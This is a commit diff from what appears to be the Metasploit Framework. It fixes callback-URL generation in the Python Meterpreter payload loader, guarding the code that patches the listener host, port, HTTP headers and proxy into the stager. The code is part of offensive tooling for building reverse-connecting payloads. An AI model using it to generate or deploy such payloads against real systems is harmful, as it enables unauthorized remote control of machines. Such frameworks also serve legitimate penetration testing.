uri is not always defined, fix python stager generation

2017-09-21 03:02:13 -05:00 · 2017-09-21 03:02:13 -05:00 · 37ab771ca9
parent 2076db2d61
commit 37ab771ca9
1 changed files with 22 additions and 20 deletions
--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@ -105,28 +105,30 @@ module Payload::Python::MeterpreterLoader
    # The callback URL can be different to the one that we're receiving from the interface
    # so we need to generate it
    # TODO: move this to somewhere more common so that it can be used across payload types
-    uri = "/#{(opts[:uri].to_s == '' ? opts[:url] : opts[:uri].to_s).split('/').reject(&:empty?)[-1]}"
-    callback_url = [
-      opts[:url].split(':')[0],
-      '://',
-      (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s,
-      ':',
-      (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s,
-      ds['LURI'].to_s,
-      uri,
-      '/'
-    ].join('')
+    unless opts[:url].to_s == ''
+      uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
+      callback_url = [
+        opts[:url].to_s.split(':')[0],
+        '://',
+        (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s,
+        ':',
+        (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s,
+        ds['LURI'].to_s,
+        uri,
+        '/'
+      ].join('')

-    # patch in the various payload related configuration
-    met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
-    met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
-    met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
-    met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
-    met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
+      # patch in the various payload related configuration
+      met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
+      met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
+      met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
+      met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
+      met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''

-    if http_proxy_host.to_s != ''
-      proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}"
-      met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
+      if http_proxy_host.to_s != ''
+        proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}"
+        met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
+      end
    end

    # patch in any optional stageless tcp socket setup